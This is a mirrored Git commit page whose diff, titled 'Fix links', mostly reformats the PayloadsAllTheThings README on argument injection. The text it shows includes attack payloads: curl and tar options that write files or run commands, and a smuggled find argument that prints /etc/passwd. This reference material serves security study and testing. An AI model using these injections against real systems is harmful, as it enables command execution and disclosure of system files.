ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Fix links

Browse Source
This commit is contained in:
Swissky 2022-10-06 17:55:16 +02:00 committed by GitHub
parent 69c6ee87c6
commit ba9eb30940
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
Argument Injection/README.md
View File

@ -8,7 +8,7 @@ It can happen in different situations, where you can only inject arguments to a
- Bash expansion (ex: *)
In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:
```
```py
from shlex import quote,split
import sys
import subprocess
@ -20,16 +20,16 @@ if __name__=="__main__":
r = subprocess.Popen(command)
```
It is possible for an attacker to pass several words to abuse options from ```curl``` command
```
```ps1
python python_rce.py "https://www.google.fr -o test.py"
```
We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file.
```
```ps1
['curl', 'https://www.google.fr', '-o', 'test.py']
```
## Summary
* [List of exposed commands](#List of exposed commands)
* [List of exposed commands](#list-of-exposed-commands)
* [TAR](#TAR)
* [CURL](#CURL)
* [WGET](#WGET)
@ -41,7 +41,7 @@ We can see by printing the command that all the parameters are splited allowing
### CURL
It is possible to abuse ```curl``` through the following options:
```
```ps1
-o, --output <file> Write to file instead of stdout
-O, --remote-name Write output to a file named as the remote file
```
@ -51,32 +51,32 @@ In case there is already one option in the command it is possible to inject seve
For the ```tar``` command it is possible to inject arbitrary arguments in different commands.
Argument injection can happen into the '''extract''' command:
```
```ps1
--to-command <command>
--checkpoint=1 --checkpoint-action=exec=<command>
-T <file> or --files-from <file>
```
Or in the '''create''' command:
```
```ps1
-I=<program> or -I <program>
--use-compres-program=<program>
```
There are also short options to work without spaces:
```
```ps1
-T<file>
-I"/path/to/exec"
```
### FIND
Find some_file inside /tmp directory.
```
```php
$file = "some_file";
system("find /tmp -iname ".escapeshellcmd($file));
```
Print /etc/passwd content.
```
```php
$file = "sth -or -exec cat /etc/passwd ; -quit";
system("find /tmp -iname ".escapeshellcmd($file));
```
@ -84,8 +84,6 @@ system("find /tmp -iname ".escapeshellcmd($file));
## References
- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014] (https://www.exploit-db.com/papers/33930)
- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018] (https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930)
- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)